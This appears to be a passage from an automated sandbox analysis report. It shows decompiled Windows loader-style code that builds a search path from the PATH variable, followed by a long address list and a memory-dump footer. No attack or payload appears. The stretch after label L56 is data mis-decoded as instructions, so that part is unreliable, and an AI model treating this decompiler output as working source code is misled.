                                                                                                                				unsigned int _t303;
                                                                                                                				signed int _t307;
                                                                                                                				signed int _t309;
                                                                                                                				signed int _t313;
                                                                                                                				intOrPtr _t325;
                                                                                                                				signed int _t334;
                                                                                                                				signed int _t336;
                                                                                                                				void* _t339;
                                                                                                                				signed int _t340;
                                                                                                                				signed int _t344;
                                                                                                                				signed int _t345;
                                                                                                                				void* _t347;
                                                                                                                				signed int _t348;
                                                                                                                				signed int _t350;
                                                                                                                				signed int _t353;
                                                                                                                				void* _t354;
                                                                                                                				void* _t356;
                                                                                                                
                                                                                                                				_t350 = _t353;
                                                                                                                				_t354 = _t353 - 0x4c;
                                                                                                                				_v8 =  *0x44fd360 ^ _t350;
                                                                                                                				_push(__ebx);
                                                                                                                				_push(__esi);
                                                                                                                				_push(__edi);
                                                                                                                				_t344 = 0x44fb2e8;
                                                                                                                				_v56 = _a4;
                                                                                                                				_v48 = __edx;
                                                                                                                				_v60 = __ecx;
                                                                                                                				_t303 = 0;
                                                                                                                				_v80 = 0;
                                                                                                                				asm("movsd");
                                                                                                                				_v64 = 0;
                                                                                                                				_v76 = 0;
                                                                                                                				_v72 = 0;
                                                                                                                				asm("movsd");
                                                                                                                				_v44 = 0;
                                                                                                                				_v52 = 0;
                                                                                                                				_v68 = 0;
                                                                                                                				asm("movsd");
                                                                                                                				_v32 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				asm("movsd");
                                                                                                                				_v16 = 0;
                                                                                                                				_t356 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                                                                                				_t289 = 0x48;
                                                                                                                				_t323 = 0 | _t356 == 0x00000000;
                                                                                                                				_t334 = 0;
                                                                                                                				_v37 = _t356 == 0;
                                                                                                                				if(_v48 <= 0) {
                                                                                                                					L16:
                                                                                                                					_t45 = _t289 - 0x48; // 0x0
                                                                                                                					__eflags = _t45 - 0xfffe;
                                                                                                                					if(_t45 > 0xfffe) {
                                                                                                                						_t345 = 0xc0000106;
                                                                                                                						goto L32;
                                                                                                                					} else {
                                                                                                                						_t344 = L04424620(_t303,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t289);
                                                                                                                						_v52 = _t344;
                                                                                                                						__eflags = _t344;
                                                                                                                						if(_t344 == 0) {
                                                                                                                							_t345 = 0xc0000017;
                                                                                                                							goto L32;
                                                                                                                						} else {
                                                                                                                							 *(_t344 + 0x44) =  *(_t344 + 0x44) & 0x00000000;
                                                                                                                							_t50 = _t344 + 0x48; // 0x48
                                                                                                                							_t336 = _t50;
                                                                                                                							_t323 = _v32;
                                                                                                                							 *(_t344 + 0x3c) = _t289;
                                                                                                                							_t291 = 0;
                                                                                                                							 *((short*)(_t344 + 0x30)) = _v48;
                                                                                                                							__eflags = _t323;
                                                                                                                							if(_t323 != 0) {
                                                                                                                								 *(_t344 + 0x18) = _t336;
                                                                                                                								__eflags = _t323 - 0x44f8478;
                                                                                                                								 *_t344 = ((0 | _t323 == 0x044f8478) - 0x00000001 & 0xfffffffb) + 7;
                                                                                                                								E0444F3E0(_t336,  *((intOrPtr*)(_t323 + 4)),  *_t323 & 0x0000ffff);
                                                                                                                								_t323 = _v32;
                                                                                                                								_t354 = _t354 + 0xc;
                                                                                                                								_t291 = 1;
                                                                                                                								__eflags = _a8;
                                                                                                                								_t336 = _t336 + (( *_t323 & 0x0000ffff) >> 1) * 2;
                                                                                                                								if(_a8 != 0) {
                                                                                                                									_t283 = E044939F2(_t336);
                                                                                                                									_t323 = _v32;
                                                                                                                									_t336 = _t283;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t307 = 0;
                                                                                                                							_v16 = 0;
                                                                                                                							__eflags = _v48;
                                                                                                                							if(_v48 <= 0) {
                                                                                                                								L31:
                                                                                                                								_t345 = _v68;
                                                                                                                								__eflags = 0;
                                                                                                                								 *((short*)(_t336 - 2)) = 0;
                                                                                                                								goto L32;
                                                                                                                							} else {
                                                                                                                								_t289 = _t344 + _t291 * 4;
                                                                                                                								_v56 = _t289;
                                                                                                                								do {
                                                                                                                									__eflags = _t323;
                                                                                                                									if(_t323 != 0) {
                                                                                                                										_t239 =  *(_v60 + _t307 * 4);
                                                                                                                										__eflags = _t239;
                                                                                                                										if(_t239 == 0) {
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											__eflags = _t239 == 5;
                                                                                                                											if(_t239 == 5) {
                                                                                                                												goto L30;
                                                                                                                											} else {
                                                                                                                												goto L22;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										L22:
                                                                                                                										 *_t289 =  *(_v60 + _t307 * 4);
                                                                                                                										 *(_t289 + 0x18) = _t336;
                                                                                                                										_t243 =  *(_v60 + _t307 * 4);
                                                                                                                										__eflags = _t243 - 8;
                                                                                                                										if(_t243 > 8) {
                                                                                                                											goto L56;
                                                                                                                										} else {
                                                                                                                											switch( *((intOrPtr*)(_t243 * 4 +  &M04432959))) {
                                                                                                                												case 0:
                                                                                                                													__ax =  *0x44f8488;
                                                                                                                													__eflags = __ax;
                                                                                                                													if(__ax == 0) {
                                                                                                                														goto L29;
                                                                                                                													} else {
                                                                                                                														__ax & 0x0000ffff = E0444F3E0(__edi,  *0x44f848c, __ax & 0x0000ffff);
                                                                                                                														__eax =  *0x44f8488 & 0x0000ffff;
                                                                                                                														goto L26;
                                                                                                                													}
                                                                                                                													goto L108;
                                                                                                                												case 1:
                                                                                                                													L45:
                                                                                                                													E0444F3E0(_t336, _v80, _v64);
                                                                                                                													_t278 = _v64;
                                                                                                                													goto L26;
                                                                                                                												case 2:
                                                                                                                													 *0x44f8480 & 0x0000ffff = E0444F3E0(__edi,  *0x44f8484,  *0x44f8480 & 0x0000ffff);
                                                                                                                													__eax =  *0x44f8480 & 0x0000ffff;
                                                                                                                													__eax = ( *0x44f8480 & 0x0000ffff) >> 1;
                                                                                                                													__edi = __edi + __eax * 2;
                                                                                                                													goto L28;
                                                                                                                												case 3:
                                                                                                                													__eax = _v44;
                                                                                                                													__eflags = __eax;
                                                                                                                													if(__eax == 0) {
                                                                                                                														goto L29;
                                                                                                                													} else {
                                                                                                                														__esi = __eax + __eax;
                                                                                                                														__eax = E0444F3E0(__edi, _v72, __esi);
                                                                                                                														__edi = __edi + __esi;
                                                                                                                														__esi = _v52;
                                                                                                                														goto L27;
                                                                                                                													}
                                                                                                                													goto L108;
                                                                                                                												case 4:
                                                                                                                													_push(0x2e);
                                                                                                                													_pop(__eax);
                                                                                                                													 *(__esi + 0x44) = __edi;
                                                                                                                													 *__edi = __ax;
                                                                                                                													__edi = __edi + 4;
                                                                                                                													_push(0x3b);
                                                                                                                													_pop(__eax);
                                                                                                                													 *(__edi - 2) = __ax;
                                                                                                                													goto L29;
                                                                                                                												case 5:
                                                                                                                													__eflags = _v36;
                                                                                                                													if(_v36 == 0) {
                                                                                                                														goto L45;
                                                                                                                													} else {
                                                                                                                														E0444F3E0(_t336, _v76, _v36);
                                                                                                                														_t278 = _v36;
                                                                                                                													}
                                                                                                                													L26:
                                                                                                                													_t354 = _t354 + 0xc;
                                                                                                                													_t336 = _t336 + (_t278 >> 1) * 2 + 2;
                                                                                                                													__eflags = _t336;
                                                                                                                													L27:
                                                                                                                													_push(0x3b);
                                                                                                                													_pop(_t280);
                                                                                                                													 *((short*)(_t336 - 2)) = _t280;
                                                                                                                													goto L28;
                                                                                                                												case 6:
                                                                                                                													__ebx =  *0x44f575c;
                                                                                                                													__eflags = __ebx - 0x44f575c;
                                                                                                                													if(__ebx != 0x44f575c) {
                                                                                                                														_push(0x3b);
                                                                                                                														_pop(__esi);
                                                                                                                														do {
                                                                                                                															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                                                                															E0444F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                                                                															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                                                                															__edi = __edi + __eax * 2;
                                                                                                                															__edi = __edi + 2;
                                                                                                                															 *(__edi - 2) = __si;
                                                                                                                															__ebx =  *__ebx;
                                                                                                                															__eflags = __ebx - 0x44f575c;
                                                                                                                														} while (__ebx != 0x44f575c);
                                                                                                                														__esi = _v52;
                                                                                                                														__ecx = _v16;
                                                                                                                														__edx = _v32;
                                                                                                                													}
                                                                                                                													__ebx = _v56;
                                                                                                                													goto L29;
                                                                                                                												case 7:
                                                                                                                													 *0x44f8478 & 0x0000ffff = E0444F3E0(__edi,  *0x44f847c,  *0x44f8478 & 0x0000ffff);
                                                                                                                													__eax =  *0x44f8478 & 0x0000ffff;
                                                                                                                													__eax = ( *0x44f8478 & 0x0000ffff) >> 1;
                                                                                                                													__eflags = _a8;
                                                                                                                													__edi = __edi + __eax * 2;
                                                                                                                													if(_a8 != 0) {
                                                                                                                														__ecx = __edi;
                                                                                                                														__eax = E044939F2(__ecx);
                                                                                                                														__edi = __eax;
                                                                                                                													}
                                                                                                                													goto L28;
                                                                                                                												case 8:
                                                                                                                													__eax = 0;
                                                                                                                													 *(__edi - 2) = __ax;
                                                                                                                													 *0x44f6e58 & 0x0000ffff = E0444F3E0(__edi,  *0x44f6e5c,  *0x44f6e58 & 0x0000ffff);
                                                                                                                													 *(__esi + 0x38) = __edi;
                                                                                                                													__eax =  *0x44f6e58 & 0x0000ffff;
                                                                                                                													__eax = ( *0x44f6e58 & 0x0000ffff) >> 1;
                                                                                                                													__edi = __edi + __eax * 2;
                                                                                                                													__edi = __edi + 2;
                                                                                                                													L28:
                                                                                                                													_t307 = _v16;
                                                                                                                													_t323 = _v32;
                                                                                                                													L29:
                                                                                                                													_t289 = _t289 + 4;
                                                                                                                													__eflags = _t289;
                                                                                                                													_v56 = _t289;
                                                                                                                													goto L30;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                									goto L108;
                                                                                                                									L30:
                                                                                                                									_t307 = _t307 + 1;
                                                                                                                									_v16 = _t307;
                                                                                                                									__eflags = _t307 - _v48;
                                                                                                                								} while (_t307 < _v48);
                                                                                                                								goto L31;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					while(1) {
                                                                                                                						L1:
                                                                                                                						_t243 =  *(_v60 + _t334 * 4);
                                                                                                                						if(_t243 > 8) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						switch( *((intOrPtr*)(_t243 * 4 +  &M04432935))) {
                                                                                                                							case 0:
                                                                                                                								__ax =  *0x44f8488;
                                                                                                                								__eflags = __ax;
                                                                                                                								if(__ax != 0) {
                                                                                                                									__eax = __ax & 0x0000ffff;
                                                                                                                									__ebx = __ebx + 2;
                                                                                                                									__eflags = __ebx;
                                                                                                                									goto L53;
                                                                                                                								}
                                                                                                                								goto L14;
                                                                                                                							case 1:
                                                                                                                								L44:
                                                                                                                								_t323 =  &_v64;
                                                                                                                								_v80 = E04432E3E(0,  &_v64);
                                                                                                                								_t289 = _t289 + _v64 + 2;
                                                                                                                								goto L13;
                                                                                                                							case 2:
                                                                                                                								__eax =  *0x44f8480 & 0x0000ffff;
                                                                                                                								__ebx = __ebx + __eax;
                                                                                                                								__eflags = __dl;
                                                                                                                								if(__dl != 0) {
                                                                                                                									__eax = 0x44f8480;
                                                                                                                									goto L80;
                                                                                                                								}
                                                                                                                								goto L14;
                                                                                                                							case 3:
                                                                                                                								__eax = E0441EEF0(0x44f79a0);
                                                                                                                								__eax =  &_v44;
                                                                                                                								_push(__eax);
                                                                                                                								_push(0);
                                                                                                                								_push(0);
                                                                                                                								_push(4);
                                                                                                                								_push(L"PATH");
                                                                                                                								_push(0);
                                                                                                                								L57();
                                                                                                                								__esi = __eax;
                                                                                                                								_v68 = __esi;
                                                                                                                								__eflags = __esi - 0xc0000023;
                                                                                                                								if(__esi != 0xc0000023) {
                                                                                                                									L10:
                                                                                                                									__eax = E0441EB70(__ecx, 0x44f79a0);
                                                                                                                									__eflags = __esi - 0xc0000100;
                                                                                                                									if(__esi == 0xc0000100) {
                                                                                                                										_v44 = _v44 & 0x00000000;
                                                                                                                										__eax = 0;
                                                                                                                										_v68 = 0;
                                                                                                                										goto L13;
                                                                                                                									} else {
                                                                                                                										__eflags = __esi;
                                                                                                                										if(__esi < 0) {
                                                                                                                											L32:
                                                                                                                											_t217 = _v72;
                                                                                                                											__eflags = _t217;
                                                                                                                											if(_t217 != 0) {
                                                                                                                												L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
                                                                                                                											}
                                                                                                                											_t218 = _v52;
                                                                                                                											__eflags = _t218;
                                                                                                                											if(_t218 != 0) {
                                                                                                                												__eflags = _t345;
                                                                                                                												if(_t345 < 0) {
                                                                                                                													L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                                                                                													_t218 = 0;
                                                                                                                												}
                                                                                                                											}
                                                                                                                											goto L36;
                                                                                                                										} else {
                                                                                                                											__eax = _v44;
                                                                                                                											__ebx = __ebx + __eax * 2;
                                                                                                                											__ebx = __ebx + 2;
                                                                                                                											__eflags = __ebx;
                                                                                                                											L13:
                                                                                                                											_t303 = _v36;
                                                                                                                											goto L14;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									__eax = _v44;
                                                                                                                									__ecx =  *0x44f7b9c; // 0x0
                                                                                                                									_v44 + _v44 =  *[fs:0x30];
                                                                                                                									__ecx = __ecx + 0x180000;
                                                                                                                									__eax = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                                                                									_v72 = __eax;
                                                                                                                									__eflags = __eax;
                                                                                                                									if(__eax == 0) {
                                                                                                                										__eax = E0441EB70(__ecx, 0x44f79a0);
                                                                                                                										__eax = _v52;
                                                                                                                										L36:
                                                                                                                										_pop(_t335);
                                                                                                                										_pop(_t346);
                                                                                                                										__eflags = _v8 ^ _t350;
                                                                                                                										_pop(_t290);
                                                                                                                										return E0444B640(_t218, _t290, _v8 ^ _t350, _t323, _t335, _t346);
                                                                                                                									} else {
                                                                                                                										__ecx =  &_v44;
                                                                                                                										_push(__ecx);
                                                                                                                										_push(_v44);
                                                                                                                										_push(__eax);
                                                                                                                										_push(4);
                                                                                                                										_push(L"PATH");
                                                                                                                										_push(0);
                                                                                                                										L57();
                                                                                                                										__esi = __eax;
                                                                                                                										_v68 = __eax;
                                                                                                                										goto L10;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L108;
                                                                                                                							case 4:
                                                                                                                								__ebx = __ebx + 4;
                                                                                                                								goto L14;
                                                                                                                							case 5:
                                                                                                                								_t285 = _v56;
                                                                                                                								if(_v56 != 0) {
                                                                                                                									_t323 =  &_v36;
                                                                                                                									_t287 = E04432E3E(_t285,  &_v36);
                                                                                                                									_t303 = _v36;
                                                                                                                									_v76 = _t287;
                                                                                                                								}
                                                                                                                								if(_t303 == 0) {
                                                                                                                									goto L44;
                                                                                                                								} else {
                                                                                                                									_t289 = _t289 + 2 + _t303;
                                                                                                                								}
                                                                                                                								goto L14;
                                                                                                                							case 6:
                                                                                                                								__eax =  *0x44f5764 & 0x0000ffff;
                                                                                                                								goto L53;
                                                                                                                							case 7:
                                                                                                                								__eax =  *0x44f8478 & 0x0000ffff;
                                                                                                                								__ebx = __ebx + __eax;
                                                                                                                								__eflags = _a8;
                                                                                                                								if(_a8 != 0) {
                                                                                                                									__ebx = __ebx + 0x16;
                                                                                                                									__ebx = __ebx + __eax;
                                                                                                                								}
                                                                                                                								__eflags = __dl;
                                                                                                                								if(__dl != 0) {
                                                                                                                									__eax = 0x44f8478;
                                                                                                                									L80:
                                                                                                                									_v32 = __eax;
                                                                                                                								}
                                                                                                                								goto L14;
                                                                                                                							case 8:
                                                                                                                								__eax =  *0x44f6e58 & 0x0000ffff;
                                                                                                                								__eax = ( *0x44f6e58 & 0x0000ffff) + 2;
                                                                                                                								L53:
                                                                                                                								__ebx = __ebx + __eax;
                                                                                                                								L14:
                                                                                                                								_t334 = _t334 + 1;
                                                                                                                								if(_t334 >= _v48) {
                                                                                                                									goto L16;
                                                                                                                								} else {
                                                                                                                									_t323 = _v37;
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L108;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L56:
                                                                                                                					asm("int 0x29");
                                                                                                                					asm("out 0x28, al");
                                                                                                                					_t293 = _t289 + 1;
                                                                                                                					_t244 = _t243 + 0x66;
                                                                                                                					 *((intOrPtr*)(_t293 + 4)) =  *((intOrPtr*)(_t293 + 4)) - _t244;
                                                                                                                					asm("loopne 0x29");
                                                                                                                					_t246 = _t244 + 0x74;
                                                                                                                					 *((intOrPtr*)(_t293 + 6)) =  *((intOrPtr*)(_t293 + 6)) - _t246;
                                                                                                                					_t296 = 0x25;
                                                                                                                					_t248 = _t246 + 0x1f0443ba;
                                                                                                                					 *((intOrPtr*)(_t296 + 4)) =  *((intOrPtr*)(_t296 + 4)) - _t248;
                                                                                                                					_t249 = _t248 ^ 0x0204475b;
                                                                                                                					 *((intOrPtr*)(_t296 + 4)) =  *((intOrPtr*)(_t296 + 4)) - _t249;
                                                                                                                					 *_t249 =  *_t249 - 0x43;
                                                                                                                					asm("daa");
                                                                                                                					_t297 = _t296 + 1;
                                                                                                                					_t251 = _t249 + 0x114;
                                                                                                                					 *((intOrPtr*)(_t297 + 4)) =  *((intOrPtr*)(_t297 + 4)) - _t251;
                                                                                                                					_t347 = _t344 - 1;
                                                                                                                					 *((intOrPtr*)(_t297 + 4)) =  *((intOrPtr*)(_t297 + 4)) - _t251;
                                                                                                                					asm("daa");
                                                                                                                					_pop(_t299);
                                                                                                                					 *((intOrPtr*)(_t299 + 4)) =  *((intOrPtr*)(_t299 + 4)) - _t251 + 0x18c;
                                                                                                                					_t339 = _t336 + 3;
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					_push(0x20);
                                                                                                                					_push(0x44dff00);
                                                                                                                					E0445D08C(_t299, _t339, _t347);
                                                                                                                					_v44 =  *[fs:0x18];
                                                                                                                					_t340 = 0;
                                                                                                                					 *_a24 = 0;
                                                                                                                					_t300 = _a12;
                                                                                                                					__eflags = _t300;
                                                                                                                					if(_t300 == 0) {
                                                                                                                						_t258 = 0xc0000100;
                                                                                                                					} else {
                                                                                                                						_v8 = 0;
                                                                                                                						_t348 = 0xc0000100;
                                                                                                                						_v52 = 0xc0000100;
                                                                                                                						_t260 = 4;
                                                                                                                						while(1) {
                                                                                                                							_v40 = _t260;
                                                                                                                							__eflags = _t260;
                                                                                                                							if(_t260 == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t313 = _t260 * 0xc;
                                                                                                                							_v48 = _t313;
                                                                                                                							__eflags = _t300 -  *((intOrPtr*)(_t313 + 0x43e1664));
                                                                                                                							if(__eflags <= 0) {
                                                                                                                								if(__eflags == 0) {
                                                                                                                									_t275 = E0444E5C0(_a8,  *((intOrPtr*)(_t313 + 0x43e1668)), _t300);
                                                                                                                									_t354 = _t354 + 0xc;
                                                                                                                									__eflags = _t275;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t348 = E044851BE(_t300,  *((intOrPtr*)(_v48 + 0x43e166c)), _a16, _t340, _t348, __eflags, _a20, _a24);
                                                                                                                										_v52 = _t348;
                                                                                                                										break;
                                                                                                                									} else {
                                                                                                                										_t260 = _v40;
                                                                                                                										goto L62;
                                                                                                                									}
                                                                                                                									goto L70;
                                                                                                                								} else {
                                                                                                                									L62:
                                                                                                                									_t260 = _t260 - 1;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_v32 = _t348;
                                                                                                                						__eflags = _t348;
                                                                                                                						if(_t348 < 0) {
                                                                                                                							__eflags = _t348 - 0xc0000100;
                                                                                                                							if(_t348 == 0xc0000100) {
                                                                                                                								_t309 = _a4;
                                                                                                                								__eflags = _t309;
                                                                                                                								if(_t309 != 0) {
                                                                                                                									_v36 = _t309;
                                                                                                                									__eflags =  *_t309 - _t340;
                                                                                                                									if( *_t309 == _t340) {
                                                                                                                										_t348 = 0xc0000100;
                                                                                                                										goto L76;
                                                                                                                									} else {
                                                                                                                										_t325 =  *((intOrPtr*)(_v44 + 0x30));
                                                                                                                										_t262 =  *((intOrPtr*)(_t325 + 0x10));
                                                                                                                										__eflags =  *((intOrPtr*)(_t262 + 0x48)) - _t309;
                                                                                                                										if( *((intOrPtr*)(_t262 + 0x48)) == _t309) {
                                                                                                                											__eflags =  *(_t325 + 0x1c);
                                                                                                                											if( *(_t325 + 0x1c) == 0) {
                                                                                                                												L106:
                                                                                                                												_t348 = E04432AE4( &_v36, _a8, _t300, _a16, _a20, _a24);
                                                                                                                												_v32 = _t348;
                                                                                                                												__eflags = _t348 - 0xc0000100;
                                                                                                                												if(_t348 != 0xc0000100) {
                                                                                                                													goto L69;
                                                                                                                												} else {
                                                                                                                													_t340 = 1;
                                                                                                                													_t309 = _v36;
                                                                                                                													goto L75;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t265 = E04416600( *(_t325 + 0x1c));
                                                                                                                												__eflags = _t265;
                                                                                                                												if(_t265 != 0) {
                                                                                                                													goto L106;
                                                                                                                												} else {
                                                                                                                													_t309 = _a4;
                                                                                                                													goto L75;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											L75:
                                                                                                                											_t348 = E04432C50(_t309, _a8, _t300, _a16, _a20, _a24, _t340);
                                                                                                                											L76:
                                                                                                                											_v32 = _t348;
                                                                                                                											goto L69;
                                                                                                                										}
                                                                                                                									}
                                                                                                                									goto L108;
                                                                                                                								} else {
                                                                                                                									E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                									_v8 = 1;
                                                                                                                									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                                                                									_t348 = _a24;
                                                                                                                									_t272 = E04432AE4( &_v36, _a8, _t300, _a16, _a20, _t348);
                                                                                                                									_v32 = _t272;
                                                                                                                									__eflags = _t272 - 0xc0000100;
                                                                                                                									if(_t272 == 0xc0000100) {
                                                                                                                										_v32 = E04432C50(_v36, _a8, _t300, _a16, _a20, _t348, 1);
                                                                                                                									}
                                                                                                                									_v8 = _t340;
                                                                                                                									E04432ACB();
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L69:
                                                                                                                						_v8 = 0xfffffffe;
                                                                                                                						_t258 = _t348;
                                                                                                                					}
                                                                                                                					L70:
                                                                                                                					return E0445D0D1(_t258);
                                                                                                                				}
                                                                                                                				L108:
                                                                                                                			}
                                                                                                                0x04432908
                                                                                                                0x0443290b
                                                                                                                0x00000000
                                                                                                                0x04432911
                                                                                                                0x0443291c
                                                                                                                0x04432921
                                                                                                                0x00000000
                                                                                                                0x04432921
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432880
                                                                                                                0x04432887
                                                                                                                0x0443288c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432805
                                                                                                                0x0443280a
                                                                                                                0x04432814
                                                                                                                0x04432816
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443281e
                                                                                                                0x04432821
                                                                                                                0x04432823
                                                                                                                0x00000000
                                                                                                                0x04432829
                                                                                                                0x04432829
                                                                                                                0x04432831
                                                                                                                0x0443283c
                                                                                                                0x0443283e
                                                                                                                0x00000000
                                                                                                                0x0443283e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443284e
                                                                                                                0x04432850
                                                                                                                0x04432851
                                                                                                                0x04432854
                                                                                                                0x04432857
                                                                                                                0x0443285a
                                                                                                                0x0443285c
                                                                                                                0x0443285d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443275d
                                                                                                                0x04432761
                                                                                                                0x00000000
                                                                                                                0x04432767
                                                                                                                0x0443276e
                                                                                                                0x04432773
                                                                                                                0x04432773
                                                                                                                0x04432776
                                                                                                                0x04432778
                                                                                                                0x0443277e
                                                                                                                0x0443277e
                                                                                                                0x04432781
                                                                                                                0x04432781
                                                                                                                0x04432783
                                                                                                                0x04432784
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475bd8
                                                                                                                0x04475bde
                                                                                                                0x04475be4
                                                                                                                0x04475be6
                                                                                                                0x04475be8
                                                                                                                0x04475be9
                                                                                                                0x04475bee
                                                                                                                0x04475bf8
                                                                                                                0x04475bff
                                                                                                                0x04475c01
                                                                                                                0x04475c04
                                                                                                                0x04475c07
                                                                                                                0x04475c0b
                                                                                                                0x04475c0d
                                                                                                                0x04475c0d
                                                                                                                0x04475c15
                                                                                                                0x04475c18
                                                                                                                0x04475c1b
                                                                                                                0x04475c1b
                                                                                                                0x04475c1e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044328c3
                                                                                                                0x044328c8
                                                                                                                0x044328d2
                                                                                                                0x044328d4
                                                                                                                0x044328d8
                                                                                                                0x044328db
                                                                                                                0x04475c26
                                                                                                                0x04475c28
                                                                                                                0x04475c2d
                                                                                                                0x04475c2d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475c34
                                                                                                                0x04475c36
                                                                                                                0x04475c49
                                                                                                                0x04475c4e
                                                                                                                0x04475c54
                                                                                                                0x04475c5b
                                                                                                                0x04475c5d
                                                                                                                0x04475c60
                                                                                                                0x04432788
                                                                                                                0x04432788
                                                                                                                0x0443278b
                                                                                                                0x0443278e
                                                                                                                0x0443278e
                                                                                                                0x0443278e
                                                                                                                0x04432791
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432756
                                                                                                                0x04432750
                                                                                                                0x00000000
                                                                                                                0x04432794
                                                                                                                0x04432794
                                                                                                                0x04432795
                                                                                                                0x04432798
                                                                                                                0x04432798
                                                                                                                0x00000000
                                                                                                                0x04432734
                                                                                                                0x0443272c
                                                                                                                0x04432700
                                                                                                                0x044325ef
                                                                                                                0x044325ef
                                                                                                                0x044325ef
                                                                                                                0x044325f2
                                                                                                                0x044325f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044325fe
                                                                                                                0x00000000
                                                                                                                0x044328e6
                                                                                                                0x044328ec
                                                                                                                0x044328ef
                                                                                                                0x044328f5
                                                                                                                0x044328f8
                                                                                                                0x044328f8
                                                                                                                0x00000000
                                                                                                                0x044328f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432866
                                                                                                                0x04432866
                                                                                                                0x04432876
                                                                                                                0x04432879
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044327e0
                                                                                                                0x044327e7
                                                                                                                0x044327e9
                                                                                                                0x044327eb
                                                                                                                0x04475afd
                                                                                                                0x00000000
                                                                                                                0x04475afd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432633
                                                                                                                0x04432638
                                                                                                                0x0443263b
                                                                                                                0x0443263c
                                                                                                                0x0443263e
                                                                                                                0x04432640
                                                                                                                0x04432642
                                                                                                                0x04432647
                                                                                                                0x04432649
                                                                                                                0x0443264e
                                                                                                                0x04432650
                                                                                                                0x04432653
                                                                                                                0x04432659
                                                                                                                0x044326a2
                                                                                                                0x044326a7
                                                                                                                0x044326ac
                                                                                                                0x044326b2
                                                                                                                0x04475b11
                                                                                                                0x04475b15
                                                                                                                0x04475b17
                                                                                                                0x00000000
                                                                                                                0x044326b8
                                                                                                                0x044326b8
                                                                                                                0x044326ba
                                                                                                                0x044327a6
                                                                                                                0x044327a6
                                                                                                                0x044327a9
                                                                                                                0x044327ab
                                                                                                                0x044327b9
                                                                                                                0x044327b9
                                                                                                                0x044327be
                                                                                                                0x044327c1
                                                                                                                0x044327c3
                                                                                                                0x044327c5
                                                                                                                0x044327c7
                                                                                                                0x04475c74
                                                                                                                0x04475c79
                                                                                                                0x04475c79
                                                                                                                0x044327c7
                                                                                                                0x00000000
                                                                                                                0x044326c0
                                                                                                                0x044326c0
                                                                                                                0x044326c3
                                                                                                                0x044326c6
                                                                                                                0x044326c6
                                                                                                                0x044326c9
                                                                                                                0x044326c9
                                                                                                                0x00000000
                                                                                                                0x044326c9
                                                                                                                0x044326ba
                                                                                                                0x0443265b
                                                                                                                0x0443265b
                                                                                                                0x0443265e
                                                                                                                0x04432667
                                                                                                                0x0443266d
                                                                                                                0x04432677
                                                                                                                0x0443267c
                                                                                                                0x0443267f
                                                                                                                0x04432681
                                                                                                                0x04475b49
                                                                                                                0x04475b4e
                                                                                                                0x044327cd
                                                                                                                0x044327d0
                                                                                                                0x044327d1
                                                                                                                0x044327d2
                                                                                                                0x044327d4
                                                                                                                0x044327dd
                                                                                                                0x04432687
                                                                                                                0x04432687

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
